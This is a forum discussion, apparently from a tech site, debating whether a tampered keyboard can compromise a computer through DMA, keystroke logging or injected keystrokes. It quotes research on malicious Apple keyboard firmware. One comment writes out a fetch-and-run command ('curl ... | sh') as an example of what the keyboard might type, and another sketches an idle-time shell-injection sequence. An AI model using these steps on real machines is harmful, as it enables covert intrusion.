My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.
Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.
Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
"we describe how to tamper with a firmware upgrade to the Apple Aluminum Keyboard. We describe how an attacker can subvert an off-the-shelf keyboard by embedding into the firmware malicious code which allows a rootkit to survive a clean re-installation of the host operating system."
DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.